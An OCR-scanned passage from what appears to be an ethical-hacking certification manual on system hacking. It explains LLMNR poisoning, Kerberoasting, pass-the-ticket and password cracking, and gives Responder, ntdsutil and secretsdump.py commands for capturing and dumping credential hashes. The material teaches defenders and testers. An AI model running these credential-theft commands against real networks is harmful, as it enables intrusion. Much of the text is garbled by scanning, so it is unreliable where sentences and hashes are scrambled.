Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
process, it becomes easy for an attacker to passively listen to a network for LLMNR (UDP port 5355) and NBT-NS (UDP port 137) broadcasts and respond to the request pretending to be a target host. After accepting a connection with a host, the attacker can utilize tools such as Responder.py or Metasploit to forward the request to a rogue server (for instance, TCP: 137) to perform an authentication process. During the authentication process, the attacker sends an NTLMv2 hash to the rogue server, which was obtained from the host trying to authenticate itself. This hash is stored in a disk and can be cracked using offline hash-cracking tools such as hashcat or John the Ripper. Once cracked, these credentials can be used to log in and gain access to the legitimate host system. Steps involved in LLMNR/NBT-NS poisoning: 1.
The user sends a request to connect to the data-sharing system, \\DataServer, which
she mistakenly typed as \\DtaServr. 2.
The \\DataServer responds to the user, saying that it does not know the host named \\DtaServr.
3.
The user then performs a LLMNR/NBT-NS network knows the host name\\DtaServr.
4.
The attacker replies to the user saying that it is \\DataServer, NTLMvz2 hash, and responds to the user with an error.
broadcast
to find out if anyone
in the
accepts the user
User performs
LLMNR/NBT-NS
broadcast to find out i
anyone knows User sends incorrect
host name — \\DtaServr e
\\DtaServ
boo
[stele] 2) ceeeeeeeeeeeeeeeeeeeeees > Data
\\DtaServr— NOT FOUND
Server
Host 3
Attacker responds saying that he knows \\DtaServr, accepts NTLMv2 hash and
then sends an ERROR MSG
ae
7m Attacker
Figure 6.12: LLMNR/NBT-NS poisoning attack
LLMNR/NBT-NS Poisoning Tools o
Responder
Source: https://github.com Responder is an LLMNR, NBT-NS, and MDNS poisoner. It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only Module 06 Page 613
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
responds to a File Server Service request, which is for SMB. As shown in the screenshots, attackers use the Responder tool to extract information such as the target system’s OS version, client version, NTLM client IP address, NTLM username, and password hash. ubuntu@ubuntu-virtual-Machine: ~/Responder
[sudo]
password
for
ubuntu:
§f
$ cd Responder $ chmod +x ./Responder.py $ sudo ./Responder.py -I etho
Figure 6.13: Screenshot of Responder
A
ubuntu@ubuntu-Virtual-Machine: ~/Responder Responder IP Challenge set
| Error starting TCP server on port 86, check permissions or other servers running. Listening
for events
NTLM @.10.1.11 NTLMv2-SSP Username : Windowsda\gas0n NTLMv2-SSP_Hash Jason: :Windows11:1122334455667788:4A51E1A82DB9226267684EAA3B03B9A6: 010100001 (9000000FAB168DCAF45D801694987E99B081D8F 0000800002000A005300400042003100320001000A00530040084200310032001 4000A0053004D0042003100320003000A005300400042003100320005000A0053004D00420031003200080030003 000000000001 (0000100000000200000796FD0ES13925D289AF 7F707E7261BEE3A9AG42084D2F 7C7F7494B8C108B60090A0010000000000000001
[*] Skipping previously captured hash for Windows11\Jason Requested
Share
:
\\CEH-TOOLS\IPCS
[*] Skipping previously captured hash for Windows11\Jason Requested
Share
: \\CEH-TOOLS\IPCS.
[*] Skipping previously captured hash for Windowsi1\Jason Requested Share : \\CEH-TOOLS\IPCS
Figure 6.14: Screenshot of the output of Responder showing NTLM hashes
=
Internal Monologue Attack The internal monologue attack is similar to the attack performed that the memory area of the Local Security Authority Subsystem is not dumped, thereby avoiding Windows Credential Guard and post-exploitation tool, through which attackers can extract Kerberos tickets, and NTLM hashes from LSASS process memory.
Module 06 Page 614
using Mimikatz, except Service (LSASS) process antivirus. Mimikatz is a plaintext passwords, Attackers use Mimikatz
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
to retrieve user credentials from LSASS process memory, and the acquired information helps them in performing lateral movement in the post-exploitation phase. An internal monologue attack is usually performed in a secure environment where Mimikatz cannot be executed. In this attack, using the Security Support Provider Interface (SSPI) from a user-mode application, a local procedure call to the NTLM authentication package is invoked to calculate the NetNTLM response in the context of the logged-on user. Steps to perform an internal monologue attack:
1.
The attacker disables the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic.
2.
The attacker extracts all the non-network logon tokens from all the active processes to masquerade as legitimate users.
3.
Now, the attacker interacts with NTLM SSP locally, for each masqueraded user to obtain a NetNTLMv1 response to the chosen challenge in the security context of that
user.
4.
Now, the attacker restores LMCompatibilityLevel, RestrictSendingNTLMTraffic to their actual values.
NTLMMinClientSec,
and
5.
The attacker uses rainbow tables to crack the NTLM hash of the captured responses.
6.
Finally, the attacker uses the cracked hashes to gain system-level access. Disable the security controls of NetNTLMv1.
Crack the NTLM
hash using rainbow tables
Use the cracked hashes to gainsystem-level acces: Client
Figure 6.15: Depiction of internal monologue attack
=
Cracking Kerberos Password Kerberos is the most commonly used authentication protocol for network entities. Due to its widespread acceptance, it is susceptible to various attacks. Attackers have developed various ways to hack into Kerberos and exploit its vulnerabilities to crack weak passwords, inject malicious codes, and obtain information about the network infrastructure and various network entities. Attackers target Kerberos authentication protocol in two common ways: namely, cracking the TGS, known as Kerberoasting, and cracking the TGT, known as AS-REP Roasting.
Module 06 Page 615
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking co
Exam 312-50 Certified Ethical Hacker
AS-REP Roasting (Cracking TGT) In this attack, attackers request an authentication ticket (TGT) from the KDC in the form of an AS-REQ packet. If the user account exists, the KDC replies with a TGT encrypted with the account’s credentials. This allows attackers to receive an encrypted ticket, which can then be saved offline and further cracked to obtain the password. Attackers can perform this type of attack both actively and passively. In an active scenario, attackers generate an AS-REP message for the user, whereas in a passive scenario, attackers observe an AS-REP message. In Kerberos authentication, the pre-authentication mode is enabled by default and is
designed to prevent offline password-guessing attacks. Therefore, to perform an ASREP Roasting attack, attackers must identify user accounts with pre-authentication mode disabled, i.e., the user account must be set to “Do not require Kerberos authentication.” Attackers use tools such as Rubeus to perform AS-REP roasting attacks. The following steps are involved in AS-REP Roasting: 1.
The attacker disabled.
identifies
a
user
account
with
the
pre-authentication
option
2.
On behalf of the user, the attacker requests an authentication ticket (TGT) from the domain controller or KDC.
3.
The domain controller verifies the user account and replies with a TGT encrypted
4.
The attacker stores the TGT offline, and cracks it to extract the user account password and further access the network entity (here, the application server).
with the account's credentials.
Domain
©
Controller/ KDC
obtain password
,
Discover user
Crack TGT,
account with pre-
authentication disabled
Application PP Server
Attacker Figure 6.16: AS-REP Roasting
Module 06 Page 616
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking o
Exam 312-50 Certified Ethical Hacker
Kerberoasting (Cracking TGS) In this attack, attackers request a TGS for the service principal name (SPN) of the target service account. This request is made to the domain controller by using a valid domain user’s authentication ticket (TGT). The domain controller does not have any records; if the user has accessed the network resources, it just searches the SPN in the Active Directory, and further replies with an encrypted ticket using a service account linked with SPN. The type of encryption used for the requested service ticket (ST) is RC4_HMAC_MDS, which indicates that for encrypting the ST, the NTLM password hash is used. To crack the ST, attackers export the TGS tickets from memory and save them offline to the local system. Furthermore, attackers use different NTLM hashes to crack the ST and, on successfully cracking it, the service account password can be discovered. Attackers use tools such as Kerberoast to perform Kerberoasting attacks on Kerberos authentication. The following steps are involved in Kerberoasting: 1.
On behalf of a user, the attacker requests an authentication ticket (TGT) from the domain controller or KDC.
2.
The domain controller verifies the user account and replies with an encrypted TGT.
3.
With a valid user authentication ticket (TGT), the attacker requests the TGS.
4.
The domain controller verifies the TGT and replies with a TGS ticket.
5.
The attacker stores the TGS ticket offline, and cracks it to extract the service account password and further access the network entity (here, the application server).
Domain Controller/ KDC
* @,' @
bie:
§:
Oo:
@: 2: aioe:
2: ©:
@: :
B:
2 Pere:
gig: gf 8! a: 3: gi 8: (4)
v
Vv
Crack TGS, obtain password
Application
Attacker
Server
Figure 6.17: Kerberoasting
Module 06 Page 617
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Pass-the-Ticket Attack Pass-the-ticket is a technique used for authenticating a user to a system that Kerberos tickets without providing the user’s password. Kerberos authentication users to access services provided by remote servers without the need to passwords for every requested service. To perform this attack, the attacker Kerberos tickets of legitimate accounts using credential dumping tools.
is using allows provide dumps
ATGT or ST can be captured based on the level of access permitted to a client. Here, the ST permits access to specific resources, and the TGT is used to send a request to the TGS for the ST to access all the services the client has been authorized to access. Silver Tickets are captured for resources that use Kerberos for the authentication process, and can be used to create tickets to call a specific service and access the system that offers the service. Golden tickets are captured for the domain with the KDS KRBTGT NTLM hash that allows the creation of TGTs for any profile in the Active Directory. Attackers launch pass-the-ticket attacks either by stealing the ST/TGT from an end-user machine and using it to disguise themselves as a valid user, or by stealing the ST/TGT from a compromised AS. After obtaining one of these tickets, an attacker can gain unauthorized access to the network services and search for additional permissions and critical data. Attackers use tools such as Mimikatz, launch pass-the-ticket attacks:
o
Rubeus,
Windows
Credentials
Editor,
etc.
to
Mimikatz
Source: https://github.com Mimikatz allows attackers to pass Kerberos TGT to other computers and sign in using the victim’s ticket. The tool also helps in extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. It is an open-source tool that enables anyone to see and store authentication data such as Kerberos tickets. Attackers can leverage this for privilege escalation and credential stealing.
Module 06 Page 618
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Figure 6.18: Screenshot of Mimikatz Other Active Online Attacks =
Combinator Attack In a combinator attack, attackers combine of the second dictionary. The resultant list and compound words. Attackers use this system and gain unauthorized access to the
the entries of the first dictionary with those of entries can be used to produce full names wordlist to crack a password on the target system files.
Steps involved in a combinator attack: o
Finda
valid target user.
o
Build your own two from online sources.
o.
Create a final wordlist by merging entries of two separate dictionaries. For example, if the first dictionary contains 100 words, and the second dictionary contains 70 words, then the merged dictionary contains 100 x 70 = 7000 words.
o
Use automated tools, such as hashcat, to crack the password of the target user.
dictionaries or download
two
different wordlist dictionaries
Attackers perform this type of password cracking in a situation where a random phrase of words is used as a default password generation procedure.
Module 06 Page 619
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Fingerprint Attack In a fingerprint attack, the passphrase is broken down into fingerprints consisting of single- and multi-character combinations that a target user might choose as his/her password. For example, for a word ‘password’, this technique would create
fingerprints “p’, “a”, ’s”, "8", "w", "0", "x", “a”, “pa”, "ss", “wo”, “rd”, etc, Attackers usually perform this attack to crack complex passwords such as “pass-10”. To perform this attack, attackers create a list of unique password hashes from a leaked password hash database, and then perform a brute-force attack to obtain a wordlist and further start the fingerprint attack. PRINCE Attack
A PRobability INfinite Chained Elements (PRINCE) attack is an advanced version of a combinator attack in which, instead of taking inputs from two different dictionaries, attackers use a single input dictionary to build chains of combined words. This chain can have between 1 and n words from the input dictionary concatenated together to forma chain of words. For example, if the length of characters to be guessed is 5, then the following combinations are created from the input dictionary: 5-letter word 3-letter word + 2-letter word 2-letter word + 3-letter word 1-letter word + 4-letter word
w @tC. Toggle-Case Attack In a toggle-case attack, attackers try all possible upper-case and lower-case combinations of a word present in the input dictionary. For example, if a word in the input dictionary is “xyz”, the following set of combinations is generated:
w @tC. The success rate of this attack is low for the following reasons: o
If users use upper-case letters, they either use it in the first place or in between the word
o
In other cases, the users use a lower or equal number of upper-case lower-case letters
Module 06 Page 620
letters than
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Markov-Chain Attack In Markov-chain attacks, attackers gather a password database and split each password entry into two- and three-character syllables (2-grams and 3-grams); using these character elements, a new alphabet is developed, which is then matched with the existing password database. In the initial phase of this attack, attackers set a threshold parameter for the occurrences of the elements, and only the letters present in the new alphabet that occurred at least the minimum number of times are selected. Furthermore, this technique combines the selected letters into words with a maximum length of eight characters, and then a dictionary attack is performed to crack the target password. GPU-based Attack Graphics processing units (GPUs) are specialized circuits used in advanced computing devices to display graphics. GPUs can also be used by web browsers to expedite application processing in data centers and cloud environments. GPUs are based on cross-platform APIs such as OpenGL that can be accessed by any application on the device with user-level credentials or permissions. As computing devices such as laptops or desktops are configured with graphics drivers and libraries by default, GPU-based attacks can be launched through their APIs. To perform a GPU-based attack, attackers initially perform social engineering to trick the victim into downloading a malicious program or application. Then, the malicious program allows the attackers to secretly track user activities on the browser and perform side-channel leaks to steal passwords. The working of a GPU attack is as follows: o
The attacker lures or forces the victim into visiting an insecure site or downloading a malware-loaded application onto their system.
o
When the victim installs the malware-loaded accessing the browser’s OpenGL API.
o
The malware on OpenGL API sets up a spy on the device to track activities on the browser.
o
When the victim accesses any website via the browser, attackers can copy every character entered by the victim on the password field of the website.
Module 06 Page 621
application,
the
malware
starts
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
User is tricked to download and install malicious app
Malicious app exploits browser’s OpenGL API and sends user’s
browser activities to the attacker
eens
User opens a website through the infected browser and provides is/her credet s to login Attacker receives password characters v
entered by the user
Server
Attacker Figure 6.19: Illustration of a GPU-based password attack
Module 06 Page 622
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Passive Online Attacks: Wire Sniffing ‘@
CE H
Attackers run packet sniffer tools on the local area network (LAN) to access
and record the raw network traffic ‘@
The captured data may include sensitive information such as passwords (FTP, rlogin sessions, etc.) and emails
‘@
Sniffed credentials are used to gain unauthorized access to the target system
Wire Sniffing
“>
Computationally Complex
i) Victim
Attacker
Passive Online Attacks: Man-in-the-Middle/Manipulator-in-the-
Middle and Replay Attacks
cE H
ol
] |
@
] ]
] |
] |
l
‘@
Inan MITM attack, the attacker acquires access to
Considerations
the communication channels between the victim and the server to extract the information needed
©
Relatively hard to perpetrate
Ina
@
Must be trusted by one or both sides
@
Can sometimes be broken by
replay attack, packets and authentication tokens
are captured using a sniffer. After the relevant information is extracted, the tokens are placed back on the network to gain access
Victim
invalidating traffic
MITM/Repl: Replay
hts Reserved Reproduction i
Passive Online Attacks =
Wire Sniffing Packet sniffing is a form of wire sniffing or wiretapping in which hackers sniff credentials during transit by capturing Internet packets. Attackers rarely use sniffers to perform this type of attack. With packet sniffing, an attacker can gain passwords to applications such
Module 06 Page 623
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
as email, websites, SMB,
FTP, rlogin sessions, or SQL. As sniffers run in the background,
the victim remains unaware of the sniffing.
a
Victim
Attacker
Figure 6.20: Wire sniffing
As sniffers gather packets at the data link layer, they can grab all the packets on the LAN of the machine running the sniffer program. This method is relatively hard to perpetrate and computationally complicated. This is because a network with a hub implements a broadcast medium that all systems share on the LAN. The LAN sends the data to all machines connected to it. If an attacker runs a sniffer on one system on the LAN, he/she
can gather data tools are ideally sniffers, as they are efficient at include
sent to and from any other system on the LAN. The majority of sniffer suited to sniff data in a hub environment. These tools are passive passively wait for data transfer before capturing the information. They imperceptibly gathering data from the LAN. The captured data may
passwords
sent to remote
systems
during
FTP,
rlogin sessions,
and
electronic
mail. The attacker uses these sniffed credentials to gain unauthorized access to the target system. There are a variety of tools available on the Internet for passive wire sniffing. =
Man-in-the-Middle/Manipulator-in-the-Middle and Replay Attacks When two parties are communicating, a man-in-the-middle/manipulator-in-the-middle (MITM) attack can take place, in which a third party intercepts a communication between the two parties without their knowledge. The third party eavesdrops on the traffic and then passes it along. To do this, the “man in the middle” has to sniff from both sides of the connection
simultaneously.
In an MITM
attack, the attacker acquires
access to the communication channels between the victim and server to extract the information. This type of attack is often used in telnet and wireless technologies. It is not easy to implement such attacks owing to the TCP sequence numbers and the speed of the communication. This method is relatively hard to perpetrate and can sometimes be broken by invalidating the traffic.
Original Connection
ateseneees Opt teeeeetenneenseneennesnsneensenansnesnsnensseeenseeesseeesseeeentensaesess >
preeeeeeeeeeeeeeeees >
:
Victim
ewei
i escess>> neeeersteten (RMI
MITM/ VRepla oe! RepI y
oo
«.
Web Server
Attacker Figure 6.21: Main-in-the-middle/manipulator-in-the-middle and replay attacks
Module 06 Page 624
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant info is extracted, the tokens are placed back on the network to gain access. The attacker uses this type of attack to replay bank transactions or similar types of data transfer, in the hope of replicating and/or altering activities, such as banking deposits or transfers.
Module 06 Page 625
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Offline Attacks: Rainbow Table Attack Rainbow te
| 4‘ainbowtableis a precomputed table that contains | Word lists like dictionary files, brute force lists, and their hash values
The hash of passwords is captured and compared
compare
| with the precomputed hash table. If a match is found,
ashes
E
then the password gets cracked
to
It is easyto recover passwords by comparing the
‘asy Recover
CE H
Tool to Create RainbowTables:rtgen
|@ The rtgen program needs several parametersto generate a rainbow table. The syntax for the command line is as
follows:
Syntax: rtgen hash_algorithn charset
plaintext_len min plaintext len max table index chain len chain num part_index
| | captured ‘hice password hashesto the precomputed Precomputed Hashes
lqazwed
“-® 42590034599c530b28a6a8£225d668590
hh021da
“* ©744b171 6cbf 8d4dd0 ff 4ce31a177151
9da8dasf
“® 30d696a8571a843cda453a229d741843
sodifo8sf
-
‘tte //orojectranbowerack com
"* ©744b171 6cbf 8d4dd0 ff 4ce31a177151
Offline Attacks: Distributed Network Attack ©@ A
CE H
Distributed Network Attack (DNA) technique is used for recovering passwords from hashes or password-
protected files using the unused processing power of machines across the network
@
The DNA Manager is installed in a central location where machines running on DNA Client can access it
over the network
@ The DNA Manager coordinates the attack and allocates small portions of the key search to machines that are distributed over the network @ The DNA Client runs in the background consuming only unused processor time
© The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password Al Rights Reserved. Reproduction is St
Offline Attacks Offline attacks occur when an attacker checks the validity of passwords. The attacker observes how the password is stored. If the usernames and passwords are stored in a readable file, it is easy for the attacker to gain access to the system. Hence, it is important to protect the list of passwords and keep it in an unreadable form, preferably encrypted.
Module 06 Page 626
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Offline attacks are often time-consuming but have a high success rate as the password hashes can be reversed owing to their small keyspace and short length. Notably, different passwordcracking techniques are available on the Internet. Two examples of offline attacks are as follows: 1.
Rainbow table attack
2.
Distributed Network Attack
=
Rainbow Table Attack A rainbow table attack requires less time than in memory to crack the table of all the possible table, in advance.
uses the cryptanalytic time-memory trade-off technique, which other techniques. It uses already-calculated information stored encryption. In the rainbow table attack, the attacker creates a passwords and their respective hash values, known as a rainbow
Rainbow Table: A rainbow table is a precomputed table that contains word lists like dictionary files and brute-force lists and their hash values. It is a lookup table specially used in recovering a plaintext password from a ciphertext. The attacker uses this table to look for the password and tries to recover it from password hashes. Computed Hashes: An attacker computes the hash for a list of possible passwords and compares it to the pre-computed hash table (rainbow table). If attackers find a match, they can crack the password. Compare the Hashes: An attacker captures the hash of a password and compares it with the precomputed hash table. If a match is found, then the password is cracked. It is easy to recover passwords by comparing captured password hashes to the pre-computed tables. Examples of pre-computed hashes:
Agqazwed
—-sss+ss++* »4259cc34599c530b28a6a8£225d668590
HhO2Z1da
-vveeeeee= »c744b1716cbf£8d4dd0f£4ce31a177151
Qda8dasf
-
SOdifOBSE
> 3cd696a8571a843cda453a229d741843
-++++++++-c744b1716cbf£8d4dd0
f£4ce31a177151
Figure 6.22: Pre-computed hashes
Tool to Create Rainbow Tables: rtgen
Source: http://project-rainbowcrack.com RainbowCrack is a general-purpose implementation that takes advantage of the time— memory trade-off technique to crack hashes. This project allows you to crack a hashed password.
Module 06 Page 627
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures ‘System Hacking
Exam 312-50 Certified Ethical Hacker
Attackers use the rtgen tool of this project to generate the rainbow tables. As shown in
the screenshot, the rtgen program needs several parameters to generate a rainbow table.
The syntax of the command line is: Syntax: rtgen
hash_algo rithm
plaintext_len_max
charset plaintext_len_min table_index chain_len chain_num part_index
Figure 6.23: Screenshot of rtgen
=
Distributed Network Attack A Distributed Network Attack (DNA) is a technique used for recovering passwordprotected files that utilize the unused processing power of machines spread across the network to decrypt passwords. In this attack, the attacker installs a DNA manager in a central location where machines running DNA clients can access it over a network. The DNA manager coordinates the attack and assigns small portions of the key search to machines distributed throughout the network. The DNA client runs in the background, only taking the processor time that was unused. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password. Attackers use the Password Recovery Toolkit (PRTK), which is equipped with DNA tools, to perform this attack. The features of a DNA are as follows: o.
Easily reads statistics and graphs
o
Adds user dictionaries to crack a password
o
Optimizes password atta cks for specific languages
o
Modifies the user dictionaries
o
Comprises stealth client installation functionality
o
Automatically updates cl ient while updating the DNA server
Module 06 Page 628
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
DNA can be classified into two modules: o
DNA Server Interface The DNA server interface allows users to manage DNA from a server. The DNA server module provides the user with the status of all the jobs that the DNA server is executing. The interface contains the following jobs:
o
e
Current Jobs: The current job queue consists of all the jobs the controller. The current job list has many columns, such number assigned by the DNA to the job, the name of the user’s password, the password that matches a key that can status of the job, and various other columns.
added to the list by as the identification encrypted file, the unlock the data, the
e
Finished Jobs: The finished job list provides information about the decryption jobs, including the password. It also has many columns that are similar to the current job list. These columns include the identification number assigned by DNA to the job, the name of the encrypted file, the decrypted path of the file, the key used to encrypt and decrypt the file, the date and time that the DNA server started working on the job, the date and time the DNA server finished working on the job, the elapsed time, etc.
DNA Client Interface Users can use the DNA client interface from many workstations. The interface helps the client statistics to coordinate easily and is available on machines with the preinstalled DNA client application. There are several components, such as the name of the DNA client, the name of the group to which the DNA client belongs, and the statistics about the current job.
Network Management The and can DNA
Network Traffic dialog box aids in the discovery of the network speed the DNA uses each work-unit length of the DNA client. Using the work-unit length, a DNA client work without contacting the DNA server. The DNA client application can contact the server at the beginning and end of the work-unit length.
The user can monitor the job status queue and DNA. After collecting the data from Network Traffic dialog box, the user can modify the client’s work. When the size of work-unit length increases, the speed of the network traffic decreases. A decrease in speed of the traffic leads the client working on the jobs to spend longer amounts time. Therefore, the user can make fewer requests to the server because of reduction in the bandwidth of network traffic.
Module 06 Page 629
the the the of the
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Password Recovery Tools Elcomsoft Distributed Password Recovery
Password Recovery Toolkit ‘tps:/eccessdate.com
Elcomsoft Distributed Password Recovery breaks complex passwords, recovers strong encryption keys, and unlocks documentsin a production environment
Passware Kit Forensic ‘tps:/ ww. pessware.com
hashcat ttps://hasheat.net
Ee rem ratemonmuncoenon
Windows Password Recovery Tool
(Se) https:/jwurw clears com
Pcuntocker ttps://amctop-possword.com
Password Recovery Tools Password recovery tools allow attackers to encryption keys, and unlock several documents.
=
br eak
complex
passwords,
recover
strong
Elcomsoft Distributed Password Recovery Source: https://www.elcomsoft.com
The Elcomsoft Distributed Password complex passwords, recover strong production environment.
Recovery application allows attackers to break encryption keys, and unlock documents in a
Attackers can use this tool to recover the passwords of the target system unauthorized access to the critical files and other system software.
Module 06 Page 630
to gain
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
@ Elcomsoft Distributed Password Recovery File Edit View Azure Sener Help
Dictionaries
Cert Rules
-
x
ese ot eae RIC OC
Attads
Mutations.
Result = Comment
dictionary
character group 70 hiktmmoparst
custom
mask brute force
config. pv... 13.496 %, 49m 258,
locahost: 12122
@ onine
Figure 6.24: Screenshot of Elcomsoft Distributed Password Recovery
Some of the password recovery tools are listed as follows:
=
Password Recovery Toolkit (https://accessdata.com)
=
Passware Kit Forensic (https://www.passware.com)
=
hashcat (https://hashcat.net)
=
Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
=
PCUnlocker (https://www.top-password.com)
Module 06 Page 631
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Tools to Extract the Password
Hashes
pwdump7Z
Tools to Extract the Password Hashes
@ pwdump?7 extracts LM and NTLM password hashes of local user accounts from the Security Account
Manager
(SAM) database
@
Mimikatz (https://github.com)
-
i Administrator: Command Prompt
ox
©
Powershell Empire (https://github.com)
@
DSinternals PowerShell (https://github.com)
@
Ntdsxtract (https://github.com)
‘betes: /fuen.torascaorg
Note: These tools must be run with administrator privileges Copyright © by
Tools to Extract the Password Hashes The following tools can be used to extract the password hashes from the target system: =
pwdump7
Source: https://www.tarasco.org pwdump7 is an application that dumps the password hashes (one-way functions or OWFs) from NT’s SAM database. pwdump extracts LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM) database. This application or tool runs by extracting the binary SAM and SYSTEM file from the filesystem, and then extracts the hashes. One of the most powerful features of pwdump7 is that it is also capable of dumping protected files. Pwdump7 can also extract passwords offline by selecting the target files. The use of this program requires administrative privileges on the remote system.
Module 06 Page 632
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
As shown in the screenshot, attackers use this tool to extract password hashes from the
target system.
Hi Administrator: Command Prompt
-
Oo
x
Figure 6.25: Screenshot of pwdump7
Some of the additional tools to extract password hashes are as follows:
=
Mimikatz (https://github.com)
=
Powershell Empire (https://github.com)
=
DSInternals PowerShell (https://github.com)
=
Ntdsxtract (https://github.com)
Note: The use of the above tools requires administrative privileges on the remote system.
Module 06 Page 633
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Password Cracking Using Domain Password Audit Tool (DPAT)
¢ E H
. that generates @ DPAT .isa Python script an from password hashes password use statistics .
More Info Daail
Count | 38803
dumped from a domain controller and a 7 password crack file such as hashcat.pot ‘ted using hashcat general 8 orclickable |@ Itgenerates an HTML report with : which - an attacker can open to analyze links, usernames, current passwords, and other statistics Password d statist
Ueerame| Current Passvord] Conical) | Cariy | Baseba77 | Dain | BackHais | Tay | Fa2019 | ry
dpat
pope
History| History] (EnPringin Baveba76 | Bascbal75 Binatue [Buastils Somme2019 | Sping2019
| Zodiak-Cancer|
| Histor? | Tiny kat | Baseballs | | Bacatiis |
|
88023
Passwords Discovered Through Cracking
68521
‘Unique Passwords Discovered Through Cracking
730 718 36 26
|
:
|
Percent of Passwords Cracked Percent of Unique— Passwords Cracked Members of Domain Admins” group "Domain Admins” Passwords Cracked = snot Admins”Tae Passwords Cracked 2 “Enterprise
nq
| History
‘Zodiak-Taurus | Zodiak-Pisces
Unique Password Hashes
69300
=]
History 3 |New Jo Busctall’) Back@Hy Faois
Description Password Hashes
Details
LM Hashes (Non-blank)
226 Unique LM Hashes (Non-blank) 6 Passwords Only Cracked via LM Hash >| Unique LM Hashes CrackedWhere NT Hash was Not —— oe
| Busctall? [Bick _[Sprngiois
Denails Details Details Details
Top
vord Use Stats
Password Reuse Stats
Fall2019
Password History
[Proven33 | Pilipin46 [Romans 825 | Pilipinas4.15 [Jovem 29.1 | Toba 316
=
ls
Details
Details
Ttps//athub com
Password Cracking Using Domain Password Audit Tool (DPAT) Source: https://github.com
DPAT is a Python script that generates password use statistics from password hashes dumped from a domain controller (DC) and a password crack file such as hashcat.pot generated using the hashcat tool during password cracking. It also generates an HTML report with clickable links. An attacker can open each link and analyze usernames, current passwords, and other password statistics. Initially, an attacker dumps LM and NT hash files from the DC using the compromised admin privileges, following which the attacker cracks those LM hashes and loads them into the password list file using DPAT. Steps to Crack Passwords Using DPAT =
Step 1: Run the following command to dump the password hashes from the domain controller (DC). This requires sufficient space in the C drive to store the output. ntdsutil
=
"ac
in
ntds"
"ifm"
"cr
fu
c:\temp"
q
Step 2: The dump contains two files, Active Directory\ntds.dit and registry\SYSTEM. Now, convert the output file format to the format accepted by the DPAT tool using the Python script secretsdump.py: secretsdump.py -system Directory/ntds.dit" LOCAL
registry/SYSTEM -outputfile users
-ntds
"Active
This script stores the output file in the users .ntds format.
-history > This flag can be included in the above command to view the password history in the report. Module 06 Page 634
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking =
